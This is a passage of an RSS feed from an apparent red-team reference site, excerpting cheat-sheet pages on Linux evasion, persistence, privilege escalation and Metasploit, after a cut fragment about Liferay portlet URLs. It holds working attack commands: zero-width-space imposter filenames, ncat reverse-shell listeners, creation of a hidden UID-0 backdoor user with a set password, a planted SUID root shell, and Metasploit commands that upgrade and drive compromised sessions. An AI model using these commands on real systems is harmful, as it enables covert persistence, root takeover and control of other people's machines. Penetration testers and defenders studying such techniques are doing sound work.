&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="k"&gt;?&lt;/span&gt;&lt;span class="n"&gt;p_p_id&lt;/span&gt;&lt;span class="p"&gt;=&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;portlet_ID&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;p_p_lifecycle&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0&lt;/span&gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;p_p_state&lt;/span&gt;&lt;span class="p"&gt;=&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;window_state&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;p_p_mode&lt;/span&gt;&lt;span class="p"&gt;=&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;mode&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;portlet_ID&lt;/strong&gt;: ID of the portlet to be executed. Can be a numeric ID, which is an incremental number for each portlet, or a &lt;a href="https://help.liferay.com/hc/en-us/articles/360018511712-Fully-Qualified-Portlet-IDs"&gt;liferay.com/Fully-Qualified-Portlet-IDs&lt;/a&gt;, which is a string.&lt;/p&gt;</description></item><item><title>Linux - Evasion</title><link>https://bokkapig.pages.dev/refs/internal/redteam/evasion/linux-evasion/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/evasion/linux-evasion/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#file-names"&gt;File Names&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#command-history"&gt;Command History&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#hiding-text"&gt;Hiding Text&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#timestomping"&gt;Timestomping&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#hiding-pid-listings-from-non-root-users"&gt;Hiding PID Listings From Non-Root Users&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="file-names" class="anchored-heading"&gt;File Names&lt;a class="heading-anchor" href="#file-names" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;An Unicode zero-width space can be inserted into filenames which makes the names visually indistinguishable:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# A decoy file with no special characters&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;touch &lt;span class="s1"&gt;&amp;#39;index.php&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# An imposter file with visually identical name&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;touch &lt;span class="s1"&gt;$&amp;#39;index\u200D.php&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="command-history" class="anchored-heading"&gt;Command History&lt;a class="heading-anchor" href="#command-history" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Most shells save their command history so a user can recall them again later. The command history can be viewed with the &lt;code&gt;history&lt;/code&gt; command or by manually inspecting the contents of the file pointed to by &lt;code&gt;$HISTFILE&lt;/code&gt; (e.g. &lt;code&gt;~/.bash_history&lt;/code&gt;).
This can be prevented in a number of ways.&lt;/p&gt;</description></item><item><title>Linux - Persistence</title><link>https://bokkapig.pages.dev/refs/internal/redteam/persistence/linux-persistence/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/persistence/linux-persistence/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#basic-reverse-shell"&gt;Basic Reverse Shell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#add-a-root-user"&gt;Add a Root User&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#suid-binary"&gt;SUID Binary&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#crontab"&gt;Crontab&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bash-configuration-file"&gt;Bash Configuration File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#startup-service"&gt;Startup Service&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#systemd-user-service"&gt;Systemd User Service&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#systemd-timer-file"&gt;Systemd Timer File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#message-of-the-day"&gt;Message of the Day&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#user-startup-file"&gt;User Startup File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#udev-rule"&gt;Udev Rule&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#apt-configuration"&gt;APT Configuration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssh-configuration"&gt;SSH Configuration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#git-configuration"&gt;Git Configuration&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#git-configuration-variables"&gt;Git Configuration Variables&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#git-hooks"&gt;Git Hooks&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#additional-persistence-options"&gt;Additional Linux Persistence Options&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="basic-reverse-shell" class="anchored-heading"&gt;Basic Reverse Shell&lt;a class="heading-anchor" href="#basic-reverse-shell" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ncat --udp -lvp &lt;span class="m"&gt;4242&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ncat --sctp -lvp &lt;span class="m"&gt;4242&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ncat --tcp -lvp &lt;span class="m"&gt;4242&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="add-a-root-user" class="anchored-heading"&gt;Add a Root User&lt;a class="heading-anchor" href="#add-a-root-user" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;useradd&lt;/span&gt; &lt;span class="n"&gt;-ou&lt;/span&gt; &lt;span class="mf"&gt;0&lt;/span&gt; &lt;span class="n"&gt;-g&lt;/span&gt; &lt;span class="mf"&gt;0&lt;/span&gt; &lt;span class="n"&gt;john&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;passwd&lt;/span&gt; &lt;span class="n"&gt;john&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo &lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;linuxpassword&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="n"&gt;passwd&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-stdin&lt;/span&gt; &lt;span class="n"&gt;john&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="suid-binary" class="anchored-heading"&gt;SUID Binary&lt;a class="heading-anchor" href="#suid-binary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;TMPDIR2&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;/var/tmp&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;int main(void){setresuid(0, 0, 0);system(&amp;#34;/bin/sh&amp;#34;);}&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$TMPDIR2&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;croissant&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;c&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;gcc&lt;/span&gt; &lt;span class="nv"&gt;$TMPDIR2&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;croissant&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;c&lt;/span&gt; &lt;span class="n"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;$TMPDIR2&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;croissant&lt;/span&gt; &lt;span class="mf"&gt;2&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;/&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;null&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;rm &lt;/span&gt;&lt;span class="nv"&gt;$TMPDIR2&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;croissant&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;c&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;chown&lt;/span&gt; &lt;span class="n"&gt;root&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="nv"&gt;$TMPDIR2&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;croissant&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;chmod&lt;/span&gt; &lt;span class="mf"&gt;4777&lt;/span&gt; &lt;span class="nv"&gt;$TMPDIR2&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;croissant&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="crontab" class="anchored-heading"&gt;Crontab&lt;a class="heading-anchor" href="#crontab" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Crontab (short for cron table) is a configuration file for scheduling tasks (cron jobs) in Unix-like systems. It allows users to automate repetitive commands at specific times or intervals.&lt;/p&gt;</description></item><item><title>Linux - Privilege Escalation</title><link>https://bokkapig.pages.dev/refs/internal/redteam/escalation/linux-privilege-escalation/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/escalation/linux-privilege-escalation/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#checklists"&gt;Checklist&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#looting-for-passwords"&gt;Looting for passwords&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#files-containing-passwords"&gt;Files containing passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#old-passwords-in-etcsecurityopasswd"&gt;Old passwords in /etc/security/opasswd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#last-edited-files"&gt;Last edited files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#in-memory-passwords"&gt;In memory passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#find-sensitive-files"&gt;Find sensitive files&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssh-key"&gt;SSH Key&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#sensitive-files"&gt;Sensitive files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssh-key-predictable-prng-authorized_keys-process"&gt;SSH Key Predictable PRNG (Authorized_Keys) Process&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#scheduled-tasks"&gt;Scheduled tasks&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#cron-jobs"&gt;Cron jobs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#systemd-timers"&gt;Systemd timers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#suid"&gt;SUID&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#find-suid-binaries"&gt;Find SUID binaries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#create-a-suid-binary"&gt;Create a SUID binary&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#capabilities"&gt;Capabilities&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#list-capabilities-of-binaries"&gt;List capabilities of binaries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#edit-capabilities"&gt;Edit capabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#interesting-capabilities"&gt;Interesting capabilities&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#sudo"&gt;SUDO&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#nopasswd"&gt;NOPASSWD&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ld_preload-and-nopasswd"&gt;LD_PRELOAD and NOPASSWD&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#doas"&gt;Doas&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sudo_inject"&gt;sudo_inject&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#cve-2019-14287"&gt;CVE-2019-14287&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#gtfobins"&gt;GTFOBins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wildcard"&gt;Wildcard&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#writable-files"&gt;Writable files&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#writable-etcpasswd"&gt;Writable /etc/passwd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#writable-etcsudoers"&gt;Writable /etc/sudoers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#nfs-root-squashing"&gt;NFS Root Squashing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#shared-library"&gt;Shared Library&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#ldconfig"&gt;ldconfig&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#rpath"&gt;RPATH&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#groups"&gt;Groups&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#docker"&gt;Docker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lxclxd"&gt;LXC/LXD&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#hijack-tmux-session"&gt;Hijack TMUX session&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#kernel-exploits"&gt;Kernel Exploits&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#cve-2022-0847-dirtypipe"&gt;CVE-2022-0847 (DirtyPipe)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#cve-2016-5195-dirtycow"&gt;CVE-2016-5195 (DirtyCow)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#cve-2010-3904-rds"&gt;CVE-2010-3904 (RDS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#cve-2010-4258-full-nelson"&gt;CVE-2010-4258 (Full Nelson)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#cve-2012-0056-mempodipper"&gt;CVE-2012-0056 (Mempodipper)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;There are many scripts that you can execute on a linux machine which automatically enumerate sytem information, processes, and files to locate privilege escalation vectors.
Here are a few:&lt;/p&gt;</description></item><item><title>Metasploit</title><link>https://bokkapig.pages.dev/refs/internal/command-control/metasploit/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/command-control/metasploit/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#installation"&gt;Installation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sessions"&gt;Sessions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#background-handler"&gt;Background handler&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#meterpreter---basic"&gt;Meterpreter - Basic&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#generate-a-meterpreter"&gt;Generate a meterpreter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#meterpreter-webdelivery"&gt;Meterpreter Webdelivery&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#get-system"&gt;Get System&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#persistence-startup"&gt;Persistence Startup&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#network-monitoring"&gt;Network Monitoring&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#portforward"&gt;Portforward&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#upload--download"&gt;Upload / Download&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#execute-from-memory"&gt;Execute from Memory&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mimikatz"&gt;Mimikatz&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#pass-the-hash---psexec"&gt;Pass the Hash - PSExec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#use-socks-proxy"&gt;Use SOCKS Proxy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#scripting-metasploit"&gt;Scripting Metasploit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#multiple-transports"&gt;Multiple transports&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#best-of---exploits"&gt;Best of - Exploits&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="installation" class="anchored-heading"&gt;Installation&lt;a class="heading-anchor" href="#installation" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;curl &lt;/span&gt;&lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;raw&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;githubusercontent&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;rapid7&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;metasploit-omnibus&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;master&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;templates&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;metasploit-framework&lt;/span&gt;&lt;span class="n"&gt;-wrappers&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;msfupdate&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;erb&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;msfinstall&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;chmod&lt;/span&gt; &lt;span class="mf"&gt;755&lt;/span&gt; &lt;span class="n"&gt;msfinstall&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;msfinstall&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="sessions" class="anchored-heading"&gt;Sessions&lt;a class="heading-anchor" href="#sessions" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;CTRL&lt;/span&gt;&lt;span class="p"&gt;+&lt;/span&gt;&lt;span class="n"&gt;Z&lt;/span&gt; &lt;span class="p"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;Session&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="n"&gt;Background&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sessions&lt;/span&gt; &lt;span class="p"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;List&lt;/span&gt; &lt;span class="n"&gt;sessions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sessions&lt;/span&gt; &lt;span class="n"&gt;-i&lt;/span&gt; &lt;span class="n"&gt;session_number&lt;/span&gt; &lt;span class="p"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;Interact&lt;/span&gt; &lt;span class="n"&gt;with&lt;/span&gt; &lt;span class="n"&gt;Session&lt;/span&gt; &lt;span class="n"&gt;with&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sessions&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;session_number&lt;/span&gt; &lt;span class="p"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;Upgrade&lt;/span&gt; &lt;span class="n"&gt;session&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;meterpreter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sessions&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;session_number&lt;/span&gt; &lt;span class="n"&gt;LPORT&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;4444&lt;/span&gt; &lt;span class="n"&gt;PAYLOAD_OVERRIDE&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;meterpreter&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;reverse_tcp&lt;/span&gt; &lt;span class="n"&gt;HANDLER&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;false&lt;/span&gt;&lt;span class="p"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;Upgrade&lt;/span&gt; &lt;span class="n"&gt;session&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;meterpreter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sessions&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="n"&gt;cmd&lt;/span&gt; &lt;span class="p"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;Execute&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;command&lt;/span&gt; &lt;span class="n"&gt;on&lt;/span&gt; &lt;span class="n"&gt;several&lt;/span&gt; &lt;span class="n"&gt;sessions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sessions&lt;/span&gt; &lt;span class="n"&gt;-i&lt;/span&gt; &lt;span class="mf"&gt;10&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;20&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;id&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;Execute&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;command&lt;/span&gt; &lt;span class="n"&gt;on&lt;/span&gt; &lt;span class="n"&gt;several&lt;/span&gt; &lt;span class="n"&gt;sessions&lt;/span&gt;
